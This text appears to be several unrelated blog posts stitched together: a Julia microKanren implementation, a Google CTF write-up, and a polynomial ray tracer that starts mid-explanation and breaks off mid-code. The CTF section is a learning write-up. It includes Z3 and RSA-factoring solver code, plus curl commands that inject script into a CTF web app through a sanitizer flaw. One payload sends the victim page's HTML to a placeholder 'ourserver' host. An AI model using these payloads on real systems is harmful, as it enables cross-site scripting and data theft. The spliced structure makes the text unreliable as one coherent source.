There is a paper about a minimal logic programming implementation called microKanren that has spawned many derivatives. It’s impressively short. http://webyrd.net/scheme-2013/papers/HemannMuKanren2013.pdf

I’m intrigued about such things and have my reasons for building a version of this in Julia (perhaps as an inference engine for Catlab stuff? More on that another day). There are already some implementations, but I’m opinionated and I really wanted to be sure I know how the guts work. Best way is to DIY.

There are at least 3 already existing implementations in Julia alone.

- https://github.com/latticetower/MuKanren.jl
- https://github.com/habemus-papadum/LilKanren.jl
- https://github.com/RAbraham/MiniKanren

Logic programming consists of basically two pieces, search and unification. The search shows up as a stream. MiniKanren does a kind of clever search by interleaving looking at different branches. This stops it from getting stuck in a bad infinite branch in principle. The interleaving is kind of like a riffled list append.

```
interleave [] ys = ys
interleave (x:xs) ys = x : interleave ys xs
```

But then the actual streams used in Kanren have thunks lying around in them that also need to get forced. These thunk positions are where it chooses to switch over to another branch of the search.

Unification is comparing two syntax trees with variables in them. As you scan down them, you can identify which variables correspond to which subtrees in the other structure. You may find a contradictory assignment, or only a partial assignment. I talked more about unification here. Kanren uses triangular substitutions to record the variable assignments. These substitutions are very convenient to make, but when you want to look up a variable, you have to walk through the substitution. It’s a tradeoff.
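
As a small illustration (my own, using the `Var` and `walk` definitions below, with an ordinary `Dict` standing in for the substitution): making a new binding never requires rewriting old ones, but looking a variable up may have to chase a chain.

```
s = Dict(Var(:x) => Var(:y), Var(:y) => 1)
walk(s, Var(:x))  # chases x ↦ y ↦ 1 and returns 1
walk(s, Var(:z))  # z is unbound, so it comes back unchanged
```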

Here we start describing my Julia implementation. Buyer beware. I’ve been finding very bad bugs very recently.

I diverged from microKanren in a couple ways. I wanted to avoid a list-based structure for unification. I feel like the most Julian thing to do is to use the Expr data structure that is built by Julia quotation `:`. You can see here that I tried to use a more imperative style where I could figure out how to, which I think is more idiomatic Julia.

```
struct Var
    x::Symbol
end

function walk(s,u)
    while isa(u,Var) && haskey(s,u)
        u = s[u] # haskey was just checked, so indexing is safe
    end
    return u
end

function unify(u,v,s) # basically transcribed from the microkanren paper
    u = walk(s,u)
    v = walk(s,v)
    if isa(u,Var) && isa(v,Var) && u === v # do nothing if same
        return s
    elseif isa(u,Var)
        return assoc(s,u,v)
    elseif isa(v,Var)
        return assoc(s,v,u)
    elseif isa(u, Expr) && isa(v,Expr)
        # Only function call expressions are implemented at the moment
        @assert u.head === :call && v.head === :call
        if u.args[1] === v.args[1] && length(u.args) == length(v.args) # heads match
            for (u,v) in zip( u.args[2:end] , v.args[2:end] ) # unify subpieces
                s = unify(u,v,s)
                if s === nothing
                    return nothing
                end
            end
            return s
        else # heads don't match or different arity
            return nothing
        end
    else # catchall for Symbols, Integers, etc
        if u === v
            return s
        else
            return nothing
        end
    end
end
```

I decided to use the `gensym` facility of Julia to produce new variables. That way I don’t have to thread around a variable counter like microKanren does (Julia is already doing this somewhere under the hood). Makes things a touch simpler. I made a couple `fresh` combinators for convenience. Basically you pass them an anonymous function and you get fresh logic variables to use.

```
fresh(f) = f(Var(gensym()))
fresh2(f) = f(Var(gensym()), Var(gensym()))
fresh3(f) = f(Var(gensym()), Var(gensym()), Var(gensym()))
freshn(n, f) = f([Var(gensym()) for i in 1:n ]...) # fishy lookin, but works. Not so obvious the evaluation order here.
```

Kanren is based around composing goals with disjunction and conjunction. A goal is a function that accepts a current substitution dictionary `s` and outputs a stream of possible new substitution dictionaries. If the goal fails, it outputs an empty stream. If the goal succeeds only one way, it outputs a singleton stream. I decided to attempt to use iterators to encode my streams. I’m not sure I succeeded. I also decided to forego separating out `mplus` and `unit` to match the microKanren notation and inlined their definitions here. The simplest implementations of conjunction and disjunction look like this.

```
# unification goal
eqwal(u,v) = s -> begin
    s = unify(u,v,s)
    (s === nothing) ? () : (s,)
end
# concatenate them
disj(g1,g2) = s -> Iterators.flatten( (g1(s) , g2(s)) )
# bind = "flatmap". flatten ~ join
conj(g1,g2) = s -> Iterators.flatten( map( g2 , g1(s) ))
```

However, the next level throws thunks in the mix. I think I got it to work with a special thunk Iterator type. It mutates the iterator to unthunkify it upon first forcing. I have no idea what the performance characteristics of this are.

```
# Where do these get forced? Not obvious. Do they get forced when flattened?
mutable struct Thunk #{I}
    it # Union{I,Function}
end

function pull(x) # Runs the trampoline
    while isa(x,Function)
        x = x()
    end
    x
end

function Base.length(x::Thunk)
    x.it = pull(x.it)
    Base.length(x.it)
end

function Base.iterate(x::Thunk)
    x.it = pull(x.it)
    Base.iterate(x.it)
end

function Base.iterate(x::Thunk, state)
    x.it = pull(x.it) # Should we assume forced?
    Base.iterate(x.it, state)
end

# does this have to be a macro? Yes. For evaluation order. We want g
# evaluating after Zzz is called, not before
macro Zzz(g)
    return :(s -> Thunk(() -> $(esc(g))(s)))
end
```
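
A quick sanity check of the trampoline (my own sketch, not from the original code): a thunk that yields another thunk gets unwrapped transparently when iterated.

```
t = Thunk(() -> () -> (1, 2, 3))  # two layers of delay around an iterable
collect(t)                        # pull chases the functions, then iterates: [1, 2, 3]
```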

Then the fancier conjunction and disjunction are defined like so. I think conjunction does not need to be changed since `iterate` takes care of the trampoline. (Edit: No, this is fundamentally busted insofar as it was intended to be a miniKanren style complete search. It is instead doing something closer to depth first. I might as well not even do the swapping. I suspect one cannot use flatten as-is if one wants miniKanren style search.)

```
disj(g1,g2) = s -> begin
    s1 = g1(s)
    s2 = g2(s)
    if isa(s1,Thunk) && isa(s1.it, Function) # s1.forced == false
        Iterators.flatten( (s2 , s1) )
    else
        Iterators.flatten( (s1 , s2) )
    end
end
conj(g1,g2) = s -> Iterators.flatten( map( g2 , g1(s) )) # eta expansion
```

Nice operator forms of these expressions. It’s a bummer that operator precedence is not user definable. ≅ binds more weakly than ∧ and ∨, which is not what you want.

```
∧ = conj # \wedge
∨ = disj # \vee
≅ = eqwal #\cong
```

I skipped using the association list representation of substitutions (although assoc lists are in Base). I’ve seen recommendations that one just use persistent dictionaries, and it’s just as easy to drop that in. I’m just using a stock persistent dictionary from FunctionalCollections.jl https://github.com/JuliaCollections/FunctionalCollections.jl .

```
using FunctionalCollections

function call_empty(n::Int64, c) # gets back the iterator
    collect(Iterators.take(c( @Persistent Dict() ), n))
end

function run(n, f)
    q = Var(gensym())
    res = call_empty(n, f(q))
    return map(s -> walk_star(q,s), res)
end

# walk_star uses the substitution to normalize an expression
function walk_star(v,s)
    v = walk(s,v)
    if isa(v,Var)
        return v
    elseif isa(v,Expr)
        @assert v.head == :call
        return Expr(v.head, vcat( v.args[1],
                map(v -> walk_star(v,s), v.args[2:end]))...)
    else
        return v
    end
end
```

Here we define an append relation and an addition relation. They can be used in reverse and all sorts of funny ways!

```
function nat(n) # helper to build peano numbers
    s = :zero
    for i in 1:n
        s = :(succ($s))
    end
    return s
end

function pluso(x,y,z)
    (( x ≅ :zero ) ∧ (y ≅ z) ) ∨
    fresh2( (n,m) -> (x ≅ :(succ($n))) ∧ (z ≅ :(succ($m))) ∧ @Zzz(pluso( n, y, m)))
end

function appendo(x,y,z)
    ((x ≅ :nil) ∧ (y ≅ z)) ∨
    fresh3( (hd, xs ,zs) -> (x ≅ :(cons($hd,$xs)) ) ∧ (z ≅ :(cons($hd, $zs))) ∧ @Zzz( appendo( xs,y,zs )))
end
```

Here we actually run them and see results to queries.

```
# add 2 and 2. Only one answer
>>> run(5, z -> pluso(nat(2), nat(2), z))
1-element Array{Expr,1}:
:(succ(succ(succ(succ(zero)))))
>>> run(5, z -> fresh2( (x,y) -> (z ≅ :( tup($x , $y))) ∧ pluso(x, :(succ(zero)), y)))
5-element Array{Expr,1}:
:(tup(zero, succ(zero)))
:(tup(succ(zero), succ(succ(zero))))
:(tup(succ(succ(zero)), succ(succ(succ(zero)))))
:(tup(succ(succ(succ(zero))), succ(succ(succ(succ(zero))))))
:(tup(succ(succ(succ(succ(zero)))), succ(succ(succ(succ(succ(zero)))))))
>>> run(3, q -> appendo( :(cons(3,nil)), :(cons(4,nil)), q ) )
1-element Array{Expr,1}:
:(cons(3, cons(4, nil)))
# subtractive append
>>> run(3, q -> appendo( q, :(cons(4,nil)), :(cons(3, cons(4, nil))) ) )
1-element Array{Expr,1}:
:(cons(3, nil))
# generate partitions
>>> run(10, q -> fresh2( (x,y) -> (q ≅ :(tup($x,$y))) ∧ appendo( x, y, :(cons(3,cons(4,nil))) )))
3-element Array{Expr,1}:
:(tup(nil, cons(3, cons(4, nil))))
:(tup(cons(3, nil), cons(4, nil)))
:(tup(cons(3, cons(4, nil)), nil))
```

I really should implement the occurs check.

Other things that might be interesting: using Async somehow for the streams. Store the substitutions with mutation or do union-find unification. Constraint logic programming. How hard would it be to get JuMP to tag along for the ride?

It would probably be nice to accept Expr for tuples and arrays in addition to function calls.

http://minikanren.org/ You may also want to check out the book The Reasoned Schemer.

http://io.livecode.ch/ online interactive minikanren examples

http://tca.github.io/veneer/examples/editor.html more minikanren examples.

Microkanren implementation tutorial https://www.youtube.com/watch?v=0FwIwewHC3o . Also checkout the Kanren online meetup recordings https://www.youtube.com/user/WilliamEByrd/playlists

Efficient representations for triangular substitutions – https://users.soe.ucsc.edu/~lkuper/papers/walk.pdf

https://github.com/ekmett/guanxi https://www.youtube.com/watch?v=D7rlJWc3474&ab_channel=MonadicWarsaw

Could it be fruitful to work natively with Catlab’s GATExpr? Synquid makes it seem like extra typing information can help the search sometimes.

LogicT http://okmij.org/ftp/Computation/LogicT.pdf

Seres Spivey http://www.jucs.org/jucs_6_4/functional_reading_of_logic

Hinze backtracking https://dl.acm.org/doi/abs/10.1145/357766.351258

The “easy” problems were ass kickers. I guess they were easy in the sense that total n00bs like us could eventually get them. But good lord. It seems inhuman to me that there are people rocking these things, but there are.

We were able to finish 3 problems and got close to a 4th.

There are similar write ups here https://ctftime.org/event/1041/tasks/ . Doesn’t seem like I did anything that unusual.

This one was a binary that needed a password inputted. I booted up Ghidra to take a look at the binary, which helped a lot in seeing a decompiled version. I’ve never really used Ghidra before. This is what Ghidra showed:

```
ulong main(void)
{
    int iVar1;
    uint uVar2;
    undefined auVar3 [16];
    undefined input [16];
    undefined4 local_28;
    undefined4 uStack36;
    undefined4 uStack32;
    undefined4 uStack28;

    printf("Flag: ");
    __isoc99_scanf(&DAT_0010200b,input);
    auVar3 = pshufb(input,SHUFFLE);
    auVar3 = CONCAT412(SUB164(auVar3 >> 0x60,0) + ADD32._12_4_,
             CONCAT48(SUB164(auVar3 >> 0x40,0) + ADD32._8_4_,
             CONCAT44(SUB164(auVar3 >> 0x20,0) + ADD32._4_4_,
                      SUB164(auVar3,0) + ADD32._0_4_))) ^ XOR;
    local_28 = SUB164(auVar3,0);
    uStack36 = SUB164(auVar3 >> 0x20,0);
    uStack32 = SUB164(XOR >> 0x40,0);
    uStack28 = SUB164(XOR >> 0x60,0);
    iVar1 = strncmp(input,(char *)&local_28,0x10);
    if (iVar1 == 0) {
        uVar2 = strncmp((char *)&local_28,EXPECTED_PREFIX,4);
        if (uVar2 == 0) {
            puts("SUCCESS");
            goto LAB_00101112;
        }
    }
    uVar2 = 1;
    puts("FAILURE");
LAB_00101112:
    return (ulong)uVar2;
}
```

```
001010a9 e8 b2 ff ff ff              CALL   __isoc99_scanf
001010ae 66 0f 6f 04 24              MOVDQA XMM0, xmmword ptr [RSP]=>input
001010b3 48 89 ee                    MOV    RSI, RBP
001010b6 4c 89 e7                    MOV    RDI, R12
001010b9 ba 10 00 00 00              MOV    EDX, 0x10
001010be 66 0f 38 00 05 a9 2f 00 00  PSHUFB XMM0, xmmword ptr [SHUFFLE]
001010c7 66 0f fe 05 91 2f 00 00     PADDD  XMM0, xmmword ptr [ADD32]
001010cf 66 0f ef 05 79 2f 00 00     PXOR   XMM0, xmmword ptr [XOR]
001010d7 0f 29 44 24 10              MOVAPS xmmword ptr [RSP + local_28], XMM0
001010dc e8 4f ff ff ff              CALL   strncmp
001010e1 85 c0                       TEST   EAX, EAX
001010e3 75 1b                       JNZ    LAB_00101100
001010e5 48 8b 35 94 2f 00 00        MOV    RSI=>DAT_00102020, qword ptr [EXPECTED_PREFIX] = 00102020 (43h 'C')
001010ec ba 04 00 00 00              MOV    EDX, 0x4
001010f1 48 89 ef                    MOV    RDI, RBP
001010f4 e8 37 ff ff ff              CALL   strncmp
```

Actually, having this in Ghidra makes it easier to see than it is here, because Ghidra tells you which line of C corresponds to which line of assembly. Basically, it appears (after looking up some assembly instructions) that we need to find a string that, after shuffling by a fixed pattern (SHUFFLE), packed-adding a constant (ADD32), and xoring with a constant (XOR), equals itself.
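
Here is a sketch in Python of the condition the binary checks, to make the instruction semantics concrete. The names `SHUFFLE`, `ADD32`, and `XOR` are mine, standing in for the 16-byte constants in the binary’s data section; this is a paraphrase, not decompiled output.

```
def scramble(b):  # b: the 16 input bytes
    shuffled = bytes(b[i] for i in SHUFFLE)  # pshufb: permute bytes by index
    out = b""
    for i in range(4):  # paddd and pxor act on each 32-bit lane
        lane = int.from_bytes(shuffled[4*i:4*i+4], "little")
        lane = (lane + ADD32[i]) % 2**32
        out += (lane ^ XOR[i]).to_bytes(4, "little")
    return out

# the first strncmp demands scramble(flag) == flag
```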

I suppose this must be solvable by hand? They are suspiciously reversible operations. But I ended up using Z3 because I already know it pretty well. Something that made me totally nuts was translating byte ordering between x86 and z3. The only way I was able to do it was to go into gdb, step through the program instruction by instruction, and make sure xmm0 had the same values as z3.

```
gdb a.out
break main
run
tui enable
layout asm
ni a bunch of times
print $xmm0
```

Then I put in the appropriate list reversals or reversed the bytes of the binary constants. It wasn’t so bad once I realized I had to do that.

```
from z3 import *
x = BitVec('x', 128)
#print(Extract(,0,x))
chunks8 = [ Extract(i*8+7, 8*i,x ) for i in range(16)]
#print([print for chunk in chunks8])
print(chunks8)
shuffle = [0x02 ,0x06 ,0x07 , 0x01, 0x05, 0x0b, 0x09, 0x0e, 0x03 , 0x0f ,0x04 ,0x08, 0x0a, 0x0c, 0x0d, 0x00]
#shuffle = [ 16 - i for i in shuffle ] #?? Endian? # for z3 ,extract 0 is the least significant
shufflex = [chunks8[shuf] for shuf in shuffle]
shufflex = Concat(list(reversed(shufflex)))
print(shufflex)
chunks32 = [ Extract(i*32+31, 32*i,shufflex ) for i in range(4)] #[Concat( shufflex[4*i: 4*i+4]) ) for i in range(4)]
print(chunks32)
#add32 = [0xefbeadde, 0xaddee1fe, 0x37133713, 0x66746367]
add32 = [0xedeadbeef, 0xfee1dead, 0x13371337, 0x67637466]
added = [ chunk + addo for chunk,addo in zip(chunks32,add32) ]
print(added)
xnew = Concat(list(reversed(added))) ^ 0xAAF986EB34F823D4385F1A8D49B45876 # 0x7658b4498d1a5f38d423f834eb86f9aa
print(xnew)
s = Solver()
s.add(xnew == x)
#s.add(x != 649710491438454045931875052661658691 )
#s.add(Extract( 4*8-1 , 0, xnew) == 0x102020 ) # 0x202010
print(s.check())
m = s.model()
print(m)
print(m.eval(xnew))
#bit32chunks = [ Extract(high, low, x) for i in range(4)]
#lower = Extract(31, 0, x)
#lower = Extract(31, 0, x)
#x = BitVec('addx', 128)
#[ Extract(high, low, x) for i in range(0,16)]
```

I still don’t understand what is going on with the EXPECTED_PREFIX part. Somehow that memory gets filled with “CTF”, even though it doesn’t have that in the binary file. So maybe that is a red herring?

I wonder if KLEE would’ve just found it, or if there was some other automated tool that would’ve worked? I see that one write up used angr.

This one had a Verilog file and a Verilator C++ file. Basically, a string is clocked into a circuit which does some minimal scrambling and then sets a flag once a good key has been sent in. An unexpectedly hard part was figuring out how to get Verilator to work, which wasn’t strictly necessary. Another hard part was realizing that I was supposed to netcat the key into a server. Somehow I just totally ignored the url that was in the question prompt.

Again, I used my formal methods super powers just because. I downloaded EBMC, although yosys smtbmc would probably also work.

` ~/Downloads/ebmc check.sv --trace --bound 100`

I edited the file slightly. I turned `always_ff` into `always` since ebmc didn’t seem to support it. I also initialized the memory to zero so that I could get an actual trace, and asserted that `open_safe == 0` so that it would give me a countermodel that opens the safe. ebmc returned a trace, which I sent over netcat to the server and got the real key. One could back out the key by hand here, since it is fairly simple scrambling.

```
module check(
    input clk,
    input [6:0] data,
    output wire open_safe
);

reg [6:0] memory [7:0];
reg [2:0] idx = 0;

//initial begin
//    memory[0] = 7'b1000011;
//    memory[5] = 7'b1010100;
//    memory[2] = 7'b1010100;
//    memory[7] = 7'b1111011; // 7'x7b;
//end

integer i;
initial begin
    for (i=0;i<8;i=i+1)
        memory[i] = 0;
end

wire [55:0] magic = {
    {memory[0], memory[5]},
    {memory[6], memory[2]},
    {memory[4], memory[3]},
    {memory[7], memory[1]}
};

wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] };
assign open_safe = kittens == 56'd3008192072309708;

always @(posedge clk) begin
    memory[idx] <= data;
    idx <= idx + 5;
end

assert property (open_safe==0); // || memory[0] == 7'b110111); //|| memory[0] != b00110111
endmodule
```

This one kicked my ass. I know basically nothing about crypto. The prompt was that there is a file that generates primes for an RSA encryption. They are using a fishy looking generator for the primes.

```
#!/usr/bin/python3 -u
import random
from Crypto.Util.number import *
import gmpy2
a = 0xe64a5f84e2762be5
chunk_size = 64
def gen_prime(bits):
    s = random.getrandbits(chunk_size)
    while True:
        s |= 0xc000000000000001
        p = 0
        for _ in range(bits // chunk_size):
            p = (p << chunk_size) + s
            s = a * s % 2**chunk_size
        if gmpy2.is_prime(p):
            return p
n = gen_prime(1024) * gen_prime(1024)
e = 65537
flag = open("flag.txt", "rb").read()
print('n =', hex(n))
print('e =', hex(e))
print('c =', hex(pow(bytes_to_long(flag), e, n)))
```

I went up a couple blind alleys. The first thing we tried was brute forcing. Maybe if the generator is incredibly weak, we can just generate 1,000,000 primes and we’ll get a match. No such luck.

Second I tried interpreting the whole problem into Z3 and Boolector. This did not work either. In hindsight, maybe it could have? Maybe I messed up somewhere in this code?

```
import random
from Crypto.Util.number import *
import gmpy2
from z3 import *
#x = BitVec('n', 1024)
prime_size = 1024
chunk_size = 64
s1 = ZeroExt(2*prime_size - chunk_size, BitVec('s1', chunk_size)) #prime_size)
s2 = ZeroExt(2*prime_size - chunk_size, BitVec('s2', chunk_size))
a = 0xe64a5f84e2762be5
def gen_prime(s, bits):
    s |= 0xc000000000000001
    p = 0
    for _ in range(bits // chunk_size):
        p = (p << chunk_size) + s
        s = a * s % 2**chunk_size
    return p
p = gen_prime(s1,prime_size)
q = gen_prime(s2,prime_size)
#n = 0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19
#n = 0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b
#n = BitVecVal("0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b", 64)
n = BitVec("n",2048) #(declare-const n (_ BitVec 224) )
#s = parse_smt2_string( " (assert (= n #x900000000001165742e188538bc53a3e129279c049360928a59b2de9))" , decls={"n": n})
#n = BitVecVal(0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b, 64)
#print(hex(int(str(n)))) 0xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad
#s = Solver()
bv_solver = Solver()
'''Then(With('simplify', mul2concat=True),
'solve-eqs',
'bit-blast',
'sat').solver() '''
s = bv_solver
#nstr = "#xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad"
nstr = "#xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19"
s.add(parse_smt2_string( f" (assert (= n {nstr}))" , decls={"n": n}))
#s.add( s1 < 2**chunk_size)
#s.add( s2 < 2**chunk_size)
s.add(s1 <= s2)
s.add( p * q == n)
set_option(verbose=10)
print(s.to_smt2())
print(s.check())
m = s.model()
print(m)
print(m.eval(p))
print(m.eval(q))
```

We also tried using this tool to see if we got any hits: https://github.com/Ganapati/RsaCtfTool . Didn’t work. An interesting resource in any case, and I ended up using it to actually do the decryption once I had the primes.

Reading the problem prompt, I realized they were emphasizing the way the random number generator was constructed. It turns out that this generator has a name: https://en.wikipedia.org/wiki/Lehmer_random_number_generator . This did not lead to any revelations, so it is actually a counterproductive observation.

Anyway, looking at it, each 64 bit chunk is kind of independent of each other in the primes. And when you multiply the built primes, the chunks still don’t interweave all that much, especially the most and least significant chunk of n. Eventually I realized that the first and last chunk of the key n are simply related to the product of the 2 random numbers `s` used to generate the primes. The least significant chunk is `n = s1 * s2 * a^30 mod 2^64`. And the most significant chunk of n is the most significant 64 bits of s1 * s2 (minus an unknown but small number of carries). We can reverse the a^30 by using the modular inverse of a, which I used a web form to calculate. Then we basically have the product of s1 and s2. s1 and s2 are not primes, and this is a much smaller problem, so factoring these numbers is not a challenge.
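
To spell the arithmetic out (my own recap of the reasoning above): each prime is built from 16 chunks s, a*s, a^2*s, ..., and the last chunk appended, a^15*s, lands in the least significant position. So p ≡ a^15 * s1 and q ≡ a^15 * s2 (mod 2^64), hence n = p*q ≡ a^30 * s1 * s2 (mod 2^64), and multiplying the bottom chunk of n by (a^-1)^30 recovers s1 * s2 mod 2^64.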

```
import random
from Crypto.Util.number import *
import gmpy2

chunk_size = 64
bits = 1024
a = 0xe64a5f84e2762be5 # 16594180801339730917
ainv = 13928521563655641581 # modular inverse of a wrt 2^64 https://www.dcode.fr/modular-inverse
n0 = gmpy2.mpz("0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19")

def prime_factors(n): # all prime factors, from a stack exchange post
    i = 2
    factors = []
    while i * i <= n:
        if n % i:
            i += 1
        else:
            n //= i
            factors.append(i)
    if n > 1:
        factors.append(n)
    return factors

def gen_prime_s(s,bits):
    s |= 0xc000000000000001
    p = 0
    for _ in range(bits // chunk_size):
        p = (p << chunk_size) + s
        s = a * s % 2**chunk_size
    return p

for q in range(16): # search over possible carries
    #e = q * 2 ** 64
    #print(hex(e))
    backn = 0x0273d3d4255f6b19 # least sig bits of n
    frontn = 0xab802dca026b1825 - q # most sig bits of n minus some carry
    abackn = backn # multiply a^inv ** (30? or 32?) * backn = s1 * s2 mod 2**64
    for _ in range(bits // chunk_size - 1):
        abackn = ainv * abackn % 2**chunk_size
        abackn = ainv * abackn % 2**chunk_size
    print("abackn ", hex(abackn))
    print(len(hex(abackn)))
    tot_ss = (frontn * (2 ** (chunk_size))) + abackn # combine the front and back. Should = s1 * s2
    print("frontbk", hex(tot_ss))
    print(len(hex(tot_ss)))
    g = prime_factors(tot_ss)
    print(g)
    ng = len(g)
    for i in range(2**ng): # try all ways of splitting prime list. Could do something less stupid, but whatev
        s1 = 1
        s2 = 1
        for x in range(ng):
            if (i >> x) & 1:
                s1 *= g[x]
            else:
                s2 *= g[x]
        p = gen_prime_s(s1,1024)
        q = gen_prime_s(s2,1024)
        n = p*q
        if n == n0:
            print("holy shit")
            print(f"p = {p}", )
            print(f"q = {q}", )
```

Strangely enough the web challenge was also pretty hard. This is partially because this is getting further from stuff I know about. We ended up not finishing this one, but I think we got close. We’re given access to a notes web app. Looking at the source, it turns out the server source was also being served. Eventually we figured out that we could curl in notes in an unexpected format using url-encoding, which was conspicuously enabled in body-parser. The sanitizer makes the assumption that it is receiving a string, not an object. When the sanitizer removes the quotes from the JSON.stringify output, it can actually remove an opening brace {, and then the first label of the object closes the string. When the note text is spliced into the webpage, it isn’t properly escaped. We were able to get code to run by sending in an object with labels that were javascript code.

```
curl -d 'content[;a=4;alert();]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/
```

By running an ajax request we could receive data from TJMike’s browser:

```
curl -d 'content[;var xhttp = new XMLHttpRequest();xhttp.open(`POST`, `https://ourserver`, true);xhttp.send(document.documentElement.innerHTML);]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/
```

We were at the time limit then. I’ve heard we needed to grab document.cookie, and that had the key in it?

All told pretty cool. A very well organized CTF with fun challenges. I dunno if CTFs are for me. I felt my blood pressure rising a lot.

You can add a great deal of complexity to this by more sophisticated sampling and lighting, multiple bounces, and strange surfaces, but that’s it in a nutshell.

A very popular tutorial on this is Ray Tracing in One Weekend https://raytracing.github.io/

There are a couple ways to do the geometrical collision detection part. One is to consider simple shapes like triangles and spheres and find closed form algorithms for the collision point. This is a fast and simple approach and the rough basis of the standard graphics pipeline. Another is to describe shapes via signed distance functions that tell you how far from the object you are, and use ray-marching, a Newton’s-method-like iteration that finds a position on the surface along the ray. ShaderToys very often use this technique.
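
For contrast with the root-finding approach used below, here is a minimal sphere-tracing sketch of the ray-marching idea (my own, not part of this post’s code): step along the ray by the distance the SDF reports, since no surface can be closer than that.

```
sdf_sphere(p) = sqrt(sum(abs2, p .- [0, 0, 3])) - 1.0  # signed distance to a unit sphere at (0,0,3)

function march(dir; t = 0.0, tol = 1e-6, maxsteps = 100)
    for _ in 1:maxsteps
        d = sdf_sphere(t .* dir)
        d < tol && return t  # close enough: call it a hit
        t += d               # safe step: nothing is nearer than d
    end
    return nothing           # ray missed
end

march([0.0, 0.0, 1.0])  # ≈ 2.0, the near side of the sphere
```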

If you describe your objects using algebraic (polynomial) equations, like x^2 + y^2 + (z - 3)^2 - 1 = 0 for a sphere, there is the possibility of using root finding algorithms, which are readily available. I thought this was kind of neat. Basically the ray hitting the concrete pixel can be parameterized as (t*x2, t*y2, t) with univariate polynomial coordinates, which can be plugged into the multivariate surface polynomial p(x, y, z). The result is a univariate polynomial in t which can be solved for all possible collision points via root finding. We filter for the collisions that are closest and in front of the camera. We can also use partial differentiation of the surface equation to find normal vectors at that point for the purposes of simple directional lighting.

As is, it really isn’t very fast but it’s short and it works.

Three key packages are

- https://github.com/JuliaAlgebra/TypedPolynomials.jl for multivariate polynomials
- https://juliamath.github.io/Polynomials.jl/stable/ for univariate polynomials
- https://github.com/JuliaImages/Images.jl Images for drawing Images

```
using Images
using LinearAlgebra
using TypedPolynomials
using Polynomials

function raytrace(x2,y2,p)
    z = Polynomials.Polynomial([0,1])
    # The ray parameterized by z through the origin and the point [x2,y2,1]
    x3 = [z*x2, z*y2, z]
    # get all the roots after substitution into the surface equation
    r = roots(p(x=>x3))
    # filter to use values of z that are real and in front of the camera
    hits = map(real, filter( x -> isreal(x) & (real(x) > 0.0) , r))
    if length(hits) > 0
        l = minimum(hits) # closest hit only
        x3 = [z(l) for z in x3]
        # get normal vector of surface at that point
        dp = differentiate(p, x)
        normal = normalize([ z(x=> x3) for z in dp])
        # a little directional and ambient shading
        return max(0,0.5*dot(normal,normalize([0,1,-1]))) + 0.2
    else
        return 0 # Ray did not hit surface
    end
end

@polyvar x[1:3]
# a sphere of radius 1 with center at (0,0,3)
p = x[1]^2 + x[2]^2 + (x[3] - 3)^2 - 1
box = -1:0.01:1
Gray.([ raytrace(x,y,p) for x=box, y=box ])
```

Sphere.

```
@polyvar x[1:3]
R = 2
r = 1
# another way of doing offset
x1 = x .+ [ 0, 0 , -5 ]
# a torus at (0,0,5)
# equation from https://en.wikipedia.org/wiki/Torus
